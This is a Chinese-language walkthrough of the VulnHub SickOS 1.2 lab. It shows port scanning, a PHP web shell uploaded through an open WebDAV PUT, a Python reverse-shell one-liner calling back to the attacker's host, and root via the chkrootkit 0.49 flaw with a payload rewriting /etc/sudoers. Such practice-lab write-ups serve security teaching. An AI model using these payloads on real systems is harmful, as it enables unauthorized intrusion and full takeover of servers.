vulnhub-----SickOS靶机

文章目录

  • 1.信息收集
  • 2.curl命令
  • 反弹shell
  • 提权
    • 利用POC

1.信息收集

┌──(root㉿kali)-[~/kali/vulnhub/sockos]
└─# arp-scan -l                            
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 10.10.10.10
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
10.10.10.1      00:50:56:c0:00:08       VMware, Inc.
10.10.10.2      00:50:56:e8:39:64       VMware, Inc.
10.10.10.12     00:0c:29:dc:3f:fe       VMware, Inc.
10.10.10.240    00:50:56:e4:2e:a9       VMware, Inc.4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 1.988 seconds (128.77 hosts/sec). 4 responded
┌──(root㉿kali)-[~/kali/vulnhub/sockos]
└─# nmap -p- 10.10.10.12 --min-rate 10000
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-17 02:15 EDT
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 29.20% done; ETC: 02:15 (0:00:10 remaining)
Nmap scan report for 10.10.10.12
Host is up (0.0012s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:DC:3F:FE (VMware)Nmap done: 1 IP address (1 host up) scanned in 13.43 seconds
┌──(root㉿kali)-[~]
└─# nmap -sC -sV -O 10.10.10.12          
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-17 02:15 EDT
sendto in send_ip_packet_sd: sendto(6, packet, 44, 0, 10.10.10.12, 16) => Operation not permitted
Offending packet: TCP 10.10.10.10:42045 > 10.10.10.12:9535 S ttl=55 id=50019 iplen=44  seq=823711596 win=1024 <mss 1460>
Nmap scan report for 10.10.10.12
Host is up (0.0013s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 668cc0f2857c6cc0f6ab7d480481c2d4 (DSA)
|   2048 ba86f5eecc83dfa63ffdc134bb7e62ab (RSA)
|_  256 a16cfa18da571d332c52e4ec97e29eaf (ECDSA)
80/tcp open  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:DC:3F:FE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.16 - 4.6, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.63 seconds

只开放了80和22端口,而80端口是lighttpd 1.4.28版本,上网搜索漏洞,无果

目录扫描,扫描到test目录,

┌──(root㉿kali)-[~]
└─# dirsearch -u "http://10.10.10.12" -x 403,404,500_|. _ _  _  _  _ _|_    v0.4.3                                                        (_||| _) (/_(_|| (_| )                                                                 Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460Output File: /root/reports/http_10.10.10.12/_24-03-17_02-18-53.txtTarget: http://10.10.10.12/[02:18:53] Starting:                                                                    
[02:19:38] 200 -    2KB - /test/                                            
[02:19:38] 301 -    0B  - /test  ->  http://10.10.10.12/test/               Task Completed 

2.curl命令

使用curl查看test命令。支持哪些请求方式

┌──(root㉿kali)-[~]
└─# curl -v -X OPTIONS http://10.10.10.12/test/                 
*   Trying 10.10.10.12:80...
* Connected to 10.10.10.12 (10.10.10.12) port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host: 10.10.10.12
> User-Agent: curl/7.85.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Allow: OPTIONS, GET, HEAD, POST
< Content-Length: 0
< Date: Sun, 17 Mar 2024 06:21:32 GMT
< Server: lighttpd/1.4.28
< 
* Connection #0 to host 10.10.10.12 left intact

发现支持PUT传输,就可以上传恶意文件

┌──(root㉿kali)-[~]
└─# curl -v -X PUT -H "Content-Type: application/x-http-php" -d "<?php system($_GET["c"]);?>" http://10.10.10.12/test/hacker.php
*   Trying 10.10.10.12:80...
* Connected to 10.10.10.12 (10.10.10.12) port 80 (#0)
> PUT /test/hacker.php HTTP/1.1
> Host: 10.10.10.12
> User-Agent: curl/7.85.0
> Accept: */*
> Content-Length: 17
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 201 Created
< Content-Length: 0
< Date: Sun, 17 Mar 2024 06:23:47 GMT
< Server: lighttpd/1.4.28
< 
* Connection #0 to host 10.10.10.12 left intact

看木马文件是否可以访问

┌──(root㉿kali)-[~]
└─# curl -X GET http://10.10.10.12/test/hacker.php\?cmd=whoami
www-data

反弹shell

export RHOST="10.10.10.10";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

IP端口改一下

访问http://10.10.10.12/test/hacker.php?cmd=export%20RHOST=%2210.10.10.10%22;export%20RPORT=443;python%20-c%20%27import%20sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(%22RHOST%22),int(os.getenv(%22RPORT%22))));[os.dup2(s.fileno(),fd)%20for%20fd%20in%20(0,1,2)];pty.spawn(%22/bin/bash%22)%27
本地监听443端口(其他端口不行,防火墙过滤)

在这里插入图片描述

提权

查看suid
在这里插入图片描述

查看定时任务
在这里插入图片描述
发现chkrootkit,查看版本

chkrootkit -V
chkrootkit version 0.49

searchsploit 搜索chkrootkit

┌──(root㉿kali)-[~/kali/vulnhub/sockos]
└─# searchsploit chkrootkit                             
------------------------------------------------------ ---------------------------------Exploit Title                                        |  Path
------------------------------------------------------ ---------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit)  | linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation          | linux/local/33899.txt
------------------------------------------------------ ---------------------------------
Shellcodes: No Results┌──(root㉿kali)-[~/kali/vulnhub/sockos]
└─# searchsploit -m 33899.txtExploit: Chkrootkit 0.49 - Local Privilege EscalationURL: https://www.exploit-db.com/exploits/33899Path: /usr/share/exploitdb/exploits/linux/local/33899.txtCodes: CVE-2014-0476, OSVDB-107710Verified: True
File Type: ASCII text
Copied to: /root/kali/vulnhub/sockos/33899.txt`
┌──(root㉿kali)-[~/kali/vulnhub/sockos]
└─# cat 33899.txt         
We just found a serious vulnerability in the chkrootkit package, which
may allow local attackers to gain root access to a box in certain
configurations (/tmp not mounted noexec).The vulnerability is located in the function slapper() in the
shellscript chkrootkit:#
# SLAPPER.{A,B,C,D} and the multi-platform variant
#
slapper (){SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"aSLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "OPT=-anSTATUS=0file_port=if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}">
/dev/null 2>&1thenSTATUS=1[ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \$egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print  $7 }' |
tr -d :`fifor i in ${SLAPPER_FILES}; doif [ -f ${i} ]; thenfile_port=$file_port $iSTATUS=1fidoneif [ ${STATUS} -eq 1 ] ;thenecho "Warning: Possible Slapper Worm installed ($file_port)"elseif [ "${QUIET}" != "t" ]; then echo "not infected"; fireturn ${NOT_INFECTED}fi
}The line 'file_port=$file_port $i' will execute all files specified in
$SLAPPER_FILES as the user chkrootkit is running (usually root), if
$file_port is empty, because of missing quotation marks around the
variable assignment.Steps to reproduce:- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.Suggested fix: Put quotation marks around the assignment.file_port="$file_port $i"I will also try to contact upstream, although the latest version of
chkrootkit dates back to 2009 - will have to see, if I reach a dev there.

利用POC

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.
  • 将名为“update”的非根所有者的可执行文件放在/tmp中.- 运行chkrootkit(作为uid 0) 结果:文件/tmp/update将以root身份执行,从而有效地 如果恶意内容被放置在文件中, 如果攻击者知道您定期运行chkrootkit(如 daily)并且具有对/tmp(未挂载noexec)的写访问权限,他可以 很容易利用这个。

chmod +w /etc/sudoers:修改 /etc/sudoers 文件的权限,使其可写。
echo “www-data ALL=(ALL) NOPASSWD:ALL” > /etc/sudoers:将 www-data 用户添加到 /etc/sudoers 文件中,允许该用户在不需要密码的情况下执行任何命令

www-data@ubuntu:/var/www/test$ cd /tmp
cd /tmp
www-data@ubuntu:/tmp$ ls
ls
VMwareDnD  php.socket-0  vgauthsvclog.txt.0  vmware-root
www-data@ubuntu:/tmp$ touch update
touch update
www-data@ubuntu:/tmp$ chmod +x update
chmod +x update
www-data@ubuntu:/tmp$ echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)  NOPASSWD:ALL" > /etc/sudoers' > /tmp/updatewww-data@ubuntu:/tmp$ sudo su root
sudo su rootroot@ubuntu:/tmp# cd /root
cd /root
root@ubuntu:~# ls
ls
304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz  chkrootkit-0.49
7d03aaa2bf93d80040f3f22ec6ad9d5a.txt                     newRule
root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.Thanks for giving this try.@vulnhub: Thanks for hosting this UP!.

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/758249.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

邮件客户端 Thunderbird 简单配置

1. 基本情况介绍 原来使用的邮箱客户端是 Office 365 自带的 Outlook 365切换原因&#xff1a;新装电脑&#xff0c;发现原 Outlook 中的账号信息无法迁移&#xff0c;需要耗费大量时间手动配置邮箱使用的邮箱&#xff1a;微软 O365 邮箱、qq 邮箱、163 邮箱、公司私有邮箱 …

北斗卫星引领农机春耕新时代

北斗卫星引领农机春耕新时代 随着现代科技的快速发展&#xff0c;北斗卫星成为了农业领域不可或缺的利器。在农机自动驾驶系统的引领下&#xff0c;农机正逐渐实现自主操作&#xff0c;为农民节省了大量的时间和精力&#xff0c;并最大限度地提高了农作物的产量和质量。 北斗…

MySQL | 内置函数

目录 1. 日期函数 2. 字符串函数 3. 数学函数 4. 其他函数 4.1. USER()查询当前用户 4.2. MD5(STR)对一个字符串进行md5摘要 4.3. DATABASE()显示当前正在使用的数据库 4.4. PASSWORD()函数&#xff0c;MySQL使用该函数对用户进行加密 4.5. IFNULL(VAL1, VAL2)如果VAL1…

window下安装并使用nvm(含卸载node、卸载nvm、全局安装npm)

window下安装并使用nvm&#xff08;含卸载node、卸载nvm、全局安装npm&#xff09; 一、卸载node二、安装nvm三、配置路径和下载源四、使用nvm安装node五、nvm常用命令六、卸载nvm七、全局安装npm、cnpm八、遇到的问题 nvm 全名 node.js version management&#xff0c;顾名思义…

Vivado中的五种仿真模式比较

Vivado中的五种仿真模式 在数字电路设计过程中&#xff0c;通常涵盖三个主要阶段&#xff1a;源代码编写、综合处理以及电路的实现&#xff0c;相应地&#xff0c;电路仿真的应用也与这些阶段紧密相关。根据不同设计阶段的需求&#xff0c;仿真可以被划分为RTL行为级仿真、综合…

练习4-权重衰减(李沐函数简要解析)

环境:练习1的环境 代码详解 0.导入库 import torch from torch import nn from d2l import torch as d2l1.初始化数据 这里初始化出train_iter test_iter 可以查一下之前的获取Fashion数据集后的数据格式与此对应 n_train, n_test, num_inputs, batch_size 20, 100, 200, …

三款.NET代码混淆工具比较分析:ConfuserEx、Obfuscar和Ipa Guard

随着.NET应用程序的广泛应用&#xff0c;保护知识产权和防止逆向工程的需求逐渐增长。本文将详细介绍三款知名的.NET代码混淆工具&#xff1a;ConfuserEx、Obfuscar和Ipa Guard&#xff0c;帮助读者全面了解其功能特点和应用场景。 一、ConfuserEx ConfuserEx是一个.NET代码混…

文件太大无法拷贝到u盘怎么办?可能是这个隐藏原因~

有时候我们新买的U盘&#xff0c;明明有64G的存储空间&#xff0c;怎么一个4.5G的视频想保存到U盘里会提示“文件太大”无法保存呢&#xff1f; 常见的U盘格式有FAT、FAT32、NTFS等&#xff0c;其中FAT32不支持存储单个文件体积大于4G的文件。下面教大家如何对U盘格式进行检测呢…

二开飞机机器人群发,实现自动给多个频道发送消息

频道1 频道2 二开代码部分&#xff1a; const CChatIdListprocess.env.CHANNEL_CHAT_ID_LIST; var channelChatIdArray CChatIdList.split(,);channelChatIdArray.forEach(function(item) {console.log(item); // 这里可以替换为您需要对数组中每个值进行的操作bot.sendM…

个人开发App成功上架手机应用市场的关键步骤

目录 1. 苹果审核和APP备案 2. APP上架操作步骤 3. 审核和发布 4. 上线工作 总结 参考资料 在当前移动应用市场竞争激烈的背景下&#xff0c;个人开发App如何成功上架成为开发者们必须面对的重要任务。本文将重点介绍自建App上架至手机应用市场的流程&#xff0c;包括苹果…

String类型详解

1. Java为何要创造String类 在C语言中,是没有String这个类型的,通常使用字符数组中存放一个个字符,再加上最后一个\0来表示/存放一个字符串.也可以使用一个字符指针指向字符串的首元素,直到遇到\0停止,再加上C语言头文件string.h中封装的函数,对于字符串的操作已经够用了. Java…

学完Python的7大就业方向,哪个赚钱最多?

“ 我想学Python&#xff0c;但是学完Python后都能干啥 &#xff1f;” “ 现在学Python&#xff0c;哪个方向最简单&#xff1f;哪个方向最吃香 &#xff1f;” “ …… ” 相信不少Python的初学者&#xff0c;都会遇到上面的这些问题。大家都知道Python很吃香&#xff0c;薪资…

进程管理与计划任务管理

进程管理 1、查看进程 静态 ps -auxps -elf 动态 top pgrep 查看特定条件的进程 pgrep -l “log” pgrep -l "ssh"pgrep -l -U redhat pstree 查看进程树 pstree -aup 所有用户、进程id\详细信息pstree -ap redhat 查看redhat用户的进程 任务调…

如何实现在固定位置的鼠标连点

鼠大侠的鼠标连点功能是免费的 浏览器搜索下载鼠大侠&#xff0c;指定连点间隔和启动快捷键 点击设置&#xff0c;指定点击位置

Linux 常用操作命令大全

目录 一、命令大集合 1.1 whereis 1.2 which 1.3 sudo 1.4 grep 1.5 free 1.6 top 动态显示进程的状态 1.7 ps 静态显示进程信息 1.8 df 1.9 iostat 看IO性能状态 1.10 yum安装插件命令 1.11 rpm 1.12 scp远程拷贝 1.13 uname 二、linux网络命令 2.1 centos7 防火…

SpringCloudAlibaba Nacos配置及应用

Nacos搭建及配置 nacos本机服务搭建 windows上搭建单机nacos&#xff1a; Releases alibaba/nacos GitHub 下载安装包 下载本地&#xff0c;解压&#xff0c;直接运行&#xff08;保证安装包的绝度路径只有英文字符&#xff0c;有中文会导致运行失败&#xff09;&#xff…

开发语言详解(python、java、Go(Golong)。。。。)

是语言决定行业&#xff0c;还是行业决定语言&#xff0c;说不清&#xff0c;只是觉得&#xff0c;当你做这一行的时候&#xff0c;如果你还有精力感兴趣的话&#xff0c;可以再做些了解&#xff0c;一下是自己个人见解以及官网做的整合。希望对大家有用。 目录 Python 概念&…

MySQL 多表查询与事务的操作

一,多表联查 有些数据我们已经拆分成多个表,他们之间通过外键进行连接.当我们要查询两个表的数据,各取其中的一列或者多列. 这时候就需要使用多表联查. 数据准备: # 创建部门表 create table dept(id int primary key auto_increment,name varchar(20) ) insert into dept (n…

DevEco Studio 项目创建

安装DevEco Studio后开始使用&#xff0c;双击桌面DevEco Studio 快捷方式弹出界面&#xff1a; 选择Application —> Empty Ability&#xff0c;点击Next 项目配置 Project name&#xff1a;工程的名称&#xff0c;可以自定义&#xff0c;由大小写字母、数字和下划线组成。…